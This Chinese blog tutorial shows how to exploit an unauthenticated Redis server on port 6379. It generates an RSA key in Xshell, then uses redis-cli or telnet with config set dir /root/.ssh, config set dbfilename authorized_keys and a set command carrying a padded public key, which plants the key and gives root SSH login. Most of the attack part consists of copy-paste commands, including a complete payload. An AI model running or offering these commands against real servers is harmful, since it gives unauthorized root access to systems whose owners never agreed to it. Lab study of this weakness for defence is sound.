Xshell工具利用Redis 6379写入SSH公钥漏洞

0x00 前期准备

工具使用:xshell
基础环境:
1. 启动ssh和redis服务
2. 防火墙放行22、6379端口(或关闭防火墙)

0x01 Xshell制作RSA密钥对

工具–>新建用户密钥生成向导,
然后一路下一步
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
这里由于是没有设置密钥,所以会出现弹窗,不用管,直接是

这个就是公钥了,也就是我们要写入的部分,但是别慌,直接保存下来一会再看
在这里插入图片描述
最后会出现这样的界面
在这里插入图片描述

0x02 redis写入ssh公钥

如果没有redis-cli,也可以使用telnet进行远程连接

telnet ip port
redis-cli -h ip -p port

注意修改协议,ip和端口,redis的端口默认为6379
在这里插入图片描述
在这里插入图片描述

连接上后就是这样,如要测试是否连接成功,执行ping即可
在这里插入图片描述
出现pong,即表示成功

config set dir /root/.ssh
config set dbfilename authorized_keys
set x "\n\n\n[替换]\n\n\n"

记得用公钥将’[替换]'进行替换

config set dir /root/.ssh
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAxVxlzw83oSzzYDSA8+5ncAZZbLKBtEvbVjFBpMyMiEj4NX+/3mA6RrlfQCfshYqP+vkxsj6o9YkI3d+3izKuqT4CUXcTdAanv7nnttXT6QqMFlZw7Ipa2RdwoJ304gD/d5j6pE8ht9qzEURkhCSrJFLR+xvjnDlcvrST07WbX7fKVvH85iFgX3I+Oas930MEp+hPoPy7Vs0PQJqPQvPXDwTUilbJs4gm4yQctA4XSdCIFUrtok07Okjm/bwTX4Coohrm22+I+jtRWHuxv9Cuk2npOyMdBrw+EQyTq8AW5lUsFjCFKAz9IWX/PFKAoPRMA3oacduTK8288fTxVbSw==\n\n\n"
第三个命令,至于为什么要在公钥前和后都使用换行符,这里因为公钥在authorized_keys文件中只有顶格写才能生效

在窗口一路复制粘贴命令即可
在这里插入图片描述

0x04 Xshell使用密钥连接到主机

这里正常填ssh服务的端口22
在这里插入图片描述
在身份验证这里选择public key 然后进行设置,选择使用密钥进行连接
记住要选中public key 不然设置是灰色的,无法进行点击
在这里插入图片描述
在这里插入图片描述
然后一路确定,最后环境使用root身份进行登陆即可
在这里插入图片描述
在这里插入图片描述

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值